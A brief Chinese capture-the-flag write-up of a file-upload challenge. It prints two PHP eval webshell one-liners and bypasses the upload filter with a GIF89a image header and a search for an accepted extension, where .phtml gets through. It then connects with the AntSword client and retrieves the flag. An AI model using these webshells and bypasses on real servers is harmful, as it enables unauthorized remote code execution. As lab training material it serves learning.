打开火狐和BP抓包,上传一句话木马图片
<?php @eval($_GET["123456"]); ?>
后缀从 txt 改成 jpg、jpeg 之类的图片后缀。
bp截取上传
OK,它识别到"<?"了
那就换个方法。
<script language="php">eval($_POST['123456']);</script>
等效于
<?php @eval($_GET["123456"]); ?>
继续上传
OK,还是骗不过它。
应该是上传的文件少了图片特有的东西。
百度得知:少了GIF89a的标识。
加上去:
OK,出结果。
(一般上传后的文件都在upload下)
依旧连不上,需要将jpeg改为php后缀
然而:.
那就需要一个一个试
php、php3、php4、php5、phtml、pht
phtml可以上传
用蚁剑直接连。
Url/upload/shell1.phtml
123456
根目录找到flag